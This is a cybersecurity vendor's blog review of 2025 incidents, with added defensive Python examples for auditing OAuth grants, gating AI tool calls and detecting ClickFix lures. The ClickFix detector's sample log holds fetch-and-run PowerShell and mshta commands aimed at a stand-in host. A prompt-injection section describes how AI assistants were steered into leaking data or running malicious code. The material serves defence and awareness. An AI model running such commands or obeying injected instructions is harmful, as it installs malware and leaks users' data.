2025 was a pivotal year for cybersecurity. It was marked by high-impact cyberattacks, massive data breaches, threat groups gaining unprecedented notoriety, and zero-day vulnerabilities exploited in real attacks.
At TecnetOne, we closely monitored these incidents because they reflect the real risks that companies of all sizes and industries face today. Some cases went relatively unnoticed, but others drew the attention of organizations, IT teams, and security leaders due to their scale and consequences.
In this article, we look back at the cybersecurity topics that stood out in 2025, along with a clear and direct summary of each. They are not listed in any particular order, but they all share one thing in common: they left key lessons about how digital threats are evolving and why having a strong cybersecurity strategy is no longer optional.
1. AI-Driven Attacks
If there was one trend that marked a turning point in 2025, it was the use of artificial intelligence (AI) by attackers. What was once experimental became a common tool for automating intrusions, creating more adaptable malware, and scaling attacks at high speed.
Threat groups began leveraging advanced language models to write malicious code, enhance evasion techniques, and optimize every phase of the attack. The result was a noticeable increase in the speed and volume of malicious campaigns.
New malware families were detected, capable of adapting their behavior based on the victim's environment, allowing them to remain undetected for longer. Large-scale attacks also emerged, demonstrating how AI can be used to automate tasks like target reconnaissance and credential theft on a massive scale.
There were even proof-of-concept ransomware strains using AI to assist with file encryption, data exfiltration, and the execution of complex attacks with minimal human involvement.
But AI wasn’t just used to create malware. It also began accelerating vulnerability exploitation, drastically reducing the time and technical knowledge required to launch an attack. Automated tools enabled the analysis and exploitation of known flaws in minutes.
By the end of 2025, the message was clear: AI was no longer a future promise for attackers—it had become a real accelerator of cybercrime, lowering the barrier to entry and making attacks faster, smarter, and harder to stop.
2. Zero-Day Attacks: The Perfect Entry Point
In 2025, zero-day vulnerabilities remained one of attackers' favorite tools for infiltrating corporate networks. These flaws, exploited before a patch exists, played a key role in data theft campaigns, digital espionage, and ransomware attacks.
Top targets included network edge devices and services exposed to the internet, as they form the first line between the outside world and a company’s internal systems. When these systems fail, access is often direct and silent.
Throughout the year, zero-day vulnerabilities in widely used technologies were actively exploited, including firewalls, VPN gateways, and remote access platforms. Critical business services were also affected, enabling attackers to install backdoors, steal sensitive data, and remain within networks for extended periods undetected.
One of the most notable cases involved Microsoft SharePoint, which became a prime target. One of its most exploited vulnerabilities allowed various threat actors—including ransomware groups—to deploy web shells, extract confidential information, and establish persistence in corporate environments.
Additionally, the Windows operating system was once again in the spotlight, with flaws exploited in everyday components like shortcuts and registry services. Even popular day-to-day tools, such as file compression software, were used as attack vectors through phishing campaigns designed to bypass security controls.
The takeaway was clear: any exposed software can become an entry point if not properly managed.
3. Data Theft Attacks Linked to Salesforce
In 2025, Salesforce became a recurring target of data theft and extortion campaigns—not due to direct platform flaws, but due to compromised accounts, stolen OAuth tokens, and integrated SaaS applications. Many of the incidents were linked to the ShinyHunters group, which attacked companies across multiple sectors and pressured victims via their own data leak site.

ShinyHunters Leak Site
The main attack vector was the digital supply chain: attackers compromised SaaS tools connected to Salesforce, stole credentials and tokens, and gained access to multiple environments, affecting even major tech and cybersecurity companies. The lesson was clear: protecting a SaaS environment involves much more than securing the core platform—it requires controlling access, auditing integrations, and closely monitoring all third-party providers.
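The paragraph above says that securing a SaaS tenant means controlling access and auditing integrations, not just hardening the core platform. The following script, added here as an illustration and not code from TecnetOne, Salesforce, or any vendor, shows what such an audit looks like in practice: it walks an inventory of connected apps and OAuth grants and flags the ones that are unapproved, over-scoped, idle, or holding long-lived refresh tokens. The inventory format, the field names, the `APPROVED_APPS` allowlist, the 90-day idle threshold and the review date are all constructed assumptions, not a real admin export or API.

```python
"""Audit of third-party integrations connected to a SaaS tenant.

Added example, not TecnetOne's or Salesforce's code. The inventory below is a
constructed simplification of what an export of connected apps and OAuth
grants typically contains; the field names and thresholds are assumptions.
"""
from dataclasses import dataclass, field
from datetime import date

REVIEW_DATE = date(2025, 12, 15)      # constructed "today" so results are deterministic
STALE_AFTER_DAYS = 90                  # assumed policy: idle grants are revoked
HIGH_RISK_SCOPES = {"full", "api", "refresh_token", "offline_access"}
APPROVED_APPS = {"Payroll Sync", "Support Desk Connector"}  # constructed allowlist


@dataclass
class Integration:
    name: str
    scopes: set
    last_used: date
    token_issued: date
    user_count: int


@dataclass
class Finding:
    app: str
    reasons: list = field(default_factory=list)
    risk: int = 0


def audit(integrations, today=REVIEW_DATE):
    """Return one Finding per integration that needs review, highest risk first."""
    findings = []
    for app in integrations:
        f = Finding(app.name)
        if app.name not in APPROVED_APPS:
            f.reasons.append("not on the approved integration list")
            f.risk += 3
        risky = app.scopes & HIGH_RISK_SCOPES
        if risky:
            f.reasons.append(f"broad scopes granted: {sorted(risky)}")
            f.risk += 2
        idle_days = (today - app.last_used).days
        if idle_days > STALE_AFTER_DAYS:
            f.reasons.append(f"unused for {idle_days} days; revoke or re-justify")
            f.risk += 2
        if "refresh_token" in app.scopes and (today - app.token_issued).days > 365:
            f.reasons.append("refresh token older than a year; rotate it")
            f.risk += 1
        if f.reasons:
            findings.append(f)
    return sorted(findings, key=lambda x: x.risk, reverse=True)


# Constructed inventory: one approved-but-broad app, one healthy app, and a
# forgotten trial integration holding full access with a stale token.
SAMPLE_INVENTORY = [
    Integration("Payroll Sync", {"api", "refresh_token"},
                date(2025, 12, 10), date(2025, 1, 5), 4),
    Integration("Support Desk Connector", {"read_contacts"},
                date(2025, 12, 14), date(2025, 6, 1), 120),
    Integration("Lead Enrichment Trial", {"full", "refresh_token"},
                date(2025, 3, 2), date(2024, 9, 1), 1),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_INVENTORY):
        print(f"[risk {finding.risk}] {finding.app}")
        for reason in finding.reasons:
            print(f"    - {reason}")
```

The scoring is deliberately simple; what matters is that the check runs on a schedule against the tenant's real grant list, and that a grant nobody can justify is revoked rather than left because it "might be used". In the constructed data, the trial integration scores highest because it combines every signal, while the approved payroll app is still surfaced for its broad scopes.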
Read more: How to Stay Safe from Cyberattacks in 2026: A Business Guide
4. Prompt Injection: A New Threat to Artificial Intelligence
As artificial intelligence became integrated into nearly every productivity tool, browser, and development environment in 2025, a new category of attacks emerged that caught even experts off guard: prompt injection.
Unlike traditional vulnerabilities, this type of attack doesn't exploit flaws in code. Instead, it takes advantage of how AI models interpret instructions. Through carefully crafted inputs—sometimes visible, sometimes completely hidden—attackers are able to alter the AI’s behavior, bypass security controls, or force it to carry out unintended actions.
Several high-impact cases documented in 2025 revealed the true scope of the problem. Information leaks were discovered in productivity assistants without any user interaction, vulnerabilities in automatic email summaries and calendar invitations facilitated phishing attacks, and programming assistants were manipulated into suggesting or executing malicious code.
More sophisticated attacks were even detected hiding instructions inside seemingly harmless images. Though invisible to the human eye, these messages were perfectly interpreted by AI systems, opening up a new front in intelligent model security.
The message was clear: AI must not only be powerful—it must be secure. And 2025 made it evident that protecting these systems will be one of the major challenges in the years to come.
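Because prompt injection works through how the model interprets text rather than through a code flaw, filtering the text is not a reliable defence; the practical mitigation is to decide outside the model what it is allowed to do. The gate below, an added example rather than code from the page or from any assistant vendor, sits between an assistant and its tools: every proposed tool call is checked against a fixed policy (known tools only, outbound fetches to an allowlisted host, email only to trusted domains and never with secret-looking content, and explicit user approval for actions that send data). The JSON call format, the `TOOL_POLICY` table, the `.invalid` hosts and the marker words are constructed assumptions.

```python
"""Policy gate between an AI assistant and the tools it may call.

Added example, not code from the page or any vendor. It assumes the assistant
emits proposed tool calls as JSON objects (a constructed format). The point is
that the decision to act is taken outside the model, so an injected
instruction that convinces the model to "send the report elsewhere" still
meets a policy the model cannot rewrite.
"""
import json
from urllib.parse import urlparse

# Constructed policy: which tools exist, which need a human to approve them,
# and which destinations an outbound action may target.
TOOL_POLICY = {
    "search_docs":   {"approval": False},
    "read_calendar": {"approval": False},
    "send_email":    {"approval": True},
    "http_fetch":    {"approval": False,
                      "allowed_hosts": {"intranet.example.invalid"}},
}
TRUSTED_EMAIL_DOMAINS = {"example.invalid"}
# Crude content check for the classic "leak your secrets" payload; it is a
# backstop, not the main control.
SENSITIVE_MARKERS = ("password", "api key", "secret", "token")


def evaluate(call_json, user_approved=False):
    """Return (allowed, reason) for one proposed tool call.

    user_approved must come from a real UI confirmation, never from model
    output, otherwise an injected prompt could simply claim approval.
    """
    try:
        call = json.loads(call_json)
        tool, args = call["tool"], call.get("args", {})
    except (ValueError, KeyError, TypeError):
        return False, "malformed tool call"

    policy = TOOL_POLICY.get(tool)
    if policy is None:
        return False, f"unknown tool {tool!r}"

    if tool == "http_fetch":
        host = urlparse(args.get("url", "")).hostname
        if host not in policy["allowed_hosts"]:
            return False, f"fetch to non-allowlisted host {host!r}"

    if tool == "send_email":
        to = args.get("to", "")
        domain = to.rsplit("@", 1)[-1].lower() if "@" in to else ""
        if domain not in TRUSTED_EMAIL_DOMAINS:
            return False, f"recipient domain {domain!r} not trusted"
        body = args.get("body", "").lower()
        if any(marker in body for marker in SENSITIVE_MARKERS):
            return False, "body contains sensitive material"

    if policy["approval"] and not user_approved:
        return False, "requires explicit user approval"
    return True, "ok"


# Constructed model outputs: a benign call, an outbound fetch an injected
# document might request, and two email attempts.
SAMPLE_CALLS = [
    '{"tool": "read_calendar", "args": {}}',
    '{"tool": "http_fetch", "args": {"url": "https://outside.invalid/collect"}}',
    '{"tool": "send_email", "args": {"to": "someone@outside.invalid", "body": "Q3 numbers"}}',
    '{"tool": "send_email", "args": {"to": "ceo@example.invalid", "body": "Meeting moved to 3pm"}}',
]

if __name__ == "__main__":
    for call in SAMPLE_CALLS:
        allowed, reason = evaluate(call)
        print("ALLOW " if allowed else "BLOCK ", reason, "<-", call)
```

Note that the last constructed call is blocked even though the recipient is trusted: sending is an action with consequences, so it waits for the user to confirm in the interface. That single rule covers the "no user interaction" leaks the section describes, because nothing leaves the tenant without a human in the loop.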
5. DDoS Attacks Reach Unprecedented Levels
In 2025, distributed denial-of-service (DDoS) attacks shattered all known records. Organizations worldwide were targeted by increasingly powerful offensives capable of taking down critical services within minutes.
Throughout the year, multiple large-scale attacks demonstrated just how far the “firepower” of these campaigns has evolved. Some reached peaks of several terabits per second, far exceeding what was recently considered an extreme attack.
Much of this growth is attributed to Aisuru, a botnet that emerged as one of the main forces behind the largest DDoS attacks ever recorded. In one of the most notable cases, hundreds of thousands of IP addresses were used to flood large-scale cloud infrastructure, proving that even the most robust environments can be put to the test.
In response, international authorities began taking stronger action. Over the past two years—and especially during 2025—coordinated operations were carried out to dismantle “DDoS-for-hire” services, leading to the arrest of administrators running these criminal platforms. An important step, though still insufficient against a threat that continues to grow.

Chart of Aisuru's record-breaking attack (Source: Cloudflare)
Read more: 29.7 Tbps DDoS Attack with Aisuru Botnet: New World Record
6. ClickFix: The Social Engineering Tactic That Tricked Thousands
Another major player in 2025 was the social engineering attack known as ClickFix. This technique was quickly adopted by a wide range of malicious actors—from state-sponsored groups to ransomware gangs.
What began as a Windows-targeted campaign soon expanded to macOS and Linux, infecting systems with information stealers, unauthorized remote access tools, and various forms of malware.
The method is as simple as it is effective. Victims are directed to a website that simulates a technical issue: a system error, a fake security alert, a suspicious CAPTCHA, or a supposed pending update. The “solution” appears legitimate, but in reality, it instructs the user to execute commands in PowerShell or the terminal.

ClickFix attack displaying a fake Windows Update screen
By following the instructions, users ended up unknowingly installing the malware themselves. These campaigns relied on all kinds of convincing lures: fake Windows Update screens, misleading software activation videos on TikTok, or bogus CAPTCHAs with step-by-step instructions. The result was clear—thousands of compromised systems caused by users trusting what seemed like a routine action.
Once again, 2025 delivered a critical lesson: the weakest link is still the human factor, and user awareness is just as important as any technological solution.
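User awareness is one half of the answer to ClickFix; the other is that the lure leaves a recognisable trace, because the victim launches a shell from their own desktop session with arguments that download and run something hidden. The detection below is an added example, not TecnetOne's rule set or any product's signature. It runs over constructed process-creation log lines in a simplified Sysmon-like key=value form (field names are assumptions) and flags interactive shell launches that combine several of those argument patterns, while leaving scripted IT tooling alone.

```python
"""Detection of ClickFix-style command execution from constructed process logs.

Added example, not TecnetOne's detection content. The log lines are constructed
in a simplified Sysmon-like key=value form; the field names are assumptions.
The rule looks for what the lure produces: a shell started from the user's
desktop session (explorer.exe or a terminal) with arguments that download or
hide execution, rather than a shell started by automation.
"""
import re

SHELLS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
INTERACTIVE_PARENTS = {"explorer.exe", "terminal"}   # lowercase for comparison
SUSPICIOUS_ARGS = [
    (re.compile(r"-(?:e|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget|downloadstring)\b", re.I),
     "download primitive"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory execution"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "profile bypass"),
    (re.compile(r"https?://", re.I), "remote URL"),
]


def parse(line):
    """Parse one constructed key=value log line into a dict (quotes stripped)."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}


def assess(event):
    """Return (score, indicators) for one parsed event; 0 means not of interest."""
    image = event.get("image", "").lower()
    parent = event.get("parent", "").lower()
    if image not in SHELLS or parent not in INTERACTIVE_PARENTS:
        return 0, []
    cmd = event.get("cmd", "")
    hits = [label for rx, label in SUSPICIOUS_ARGS if rx.search(cmd)]
    if image == "mshta.exe":
        hits.append("mshta launched interactively")
    return len(hits), hits


def detect(lines, threshold=2):
    """Return (host, user, score, indicators) for lines scoring at or above threshold."""
    alerts = []
    for line in lines:
        event = parse(line)
        score, hits = assess(event)
        if score >= threshold:
            alerts.append((event.get("host"), event.get("user"), score, hits))
    return alerts


# Constructed sample: a user simply opening a console, a pasted lure command,
# a legitimate management-agent script, and an mshta launch from a lure page.
SAMPLE_LOG = [
    'ts=2025-11-03T09:58:10Z host=WS-0142 user=jdoe parent=explorer.exe '
    'image=powershell.exe cmd="powershell.exe"',
    'ts=2025-11-03T10:12:44Z host=WS-0142 user=jdoe parent=explorer.exe '
    'image=powershell.exe cmd="powershell -w hidden -nop -c iex (iwr http://lure.invalid/fix)"',
    'ts=2025-11-03T10:13:02Z host=WS-0077 user=SYSTEM parent=ccmexec.exe '
    'image=powershell.exe cmd="powershell -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"',
    'ts=2025-11-03T11:40:19Z host=WS-0203 user=mruiz parent=explorer.exe '
    'image=mshta.exe cmd="mshta http://lure.invalid/verify.hta"',
]

if __name__ == "__main__":
    for host, user, score, hits in detect(SAMPLE_LOG):
        print(f"ALERT {host} {user} score={score}: {', '.join(hits)}")
```

Scoping the rule to interactive parent processes is what keeps the noise down: the constructed management-agent line carries an execution-policy bypass but is never scored because its parent is automation, while a bare console opened by the user scores zero. Tuning the threshold and the parent list to the environment's own baseline is the usual follow-up.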
7. The Ransomware Attack on Ingram Micro
In 2025, Ingram Micro (one of the world’s largest technology distributors) suffered a ransomware attack that led to a sudden disruption of its systems. Its website and online ordering platform went offline without warning, affecting thousands of businesses that rely on its services.
Over the following hours, it was confirmed that the incident was linked to SafePay, one of the most active ransomware groups of the year. The attack began abruptly, and several employees found ransom notes on their devices, prompting the company to disconnect internal systems as a containment measure.
Although the attackers claimed to have stolen data, such statements are often part of their pressure tactics. As of now, there has been no public confirmation of a massive data leak or the true extent of the encryption.
The Ingram Micro case exposed a critical issue: when a key player in the tech supply chain is attacked, the impact ripples far beyond the affected organization.
8. The Hacking of the Hermosillo Municipal Police
One of the most sensitive incidents of the year occurred in Hermosillo, Sonora, following a cyberattack on the Municipal Police, attributed to the group Chronus Team. The breach sparked serious concern due to the massive leak of sensitive information related to over 1,200 municipal officers.
The incident came to light when a 738 MB file began circulating, containing personal data, photographs, information about weapons, and details on the operational structure of the police force. Although some of the information may not be recent, its public exposure represents a real risk to the safety of officers and the institution.
Due to the volume and sensitivity of the compromised data, this attack became one of the most significant cyber incidents targeting municipal infrastructure in the past year. The case delivered a clear message to the public sector: cybersecurity is no longer optional, and having robust protection, monitoring, and incident response strategies is crucial to prevent greater consequences.
Learn more about this incident: Hermosillo Hacked: Chronus Team Leaks Municipal Police Data
Conclusion: Key Lessons from the 2025 Cyberattacks
The cybersecurity incidents of 2025 made one thing clear: no organization is completely safe. Private companies, technology providers, and public entities were all affected, showing that the impact of a cyberattack goes beyond technical damage—it also hits operations, reputation, and trust.
One of the most important takeaways was the vulnerability of the digital supply chain. Attacks on key providers and platforms revealed how a single breach can affect multiple organizations at once. This came alongside the rise of ransomware, the exploitation of zero-day vulnerabilities, and increasingly effective social engineering techniques.
It also became clear that prevention must be paired with detection and response. Security tools alone aren’t enough; continuous monitoring, proper access management, and user training to recognize threats are essential before it’s too late.
At TecnetOne, these cases underscore the importance of having a comprehensive cybersecurity strategy—one that helps companies reduce risk, respond quickly to incidents, and continuously protect their critical information.
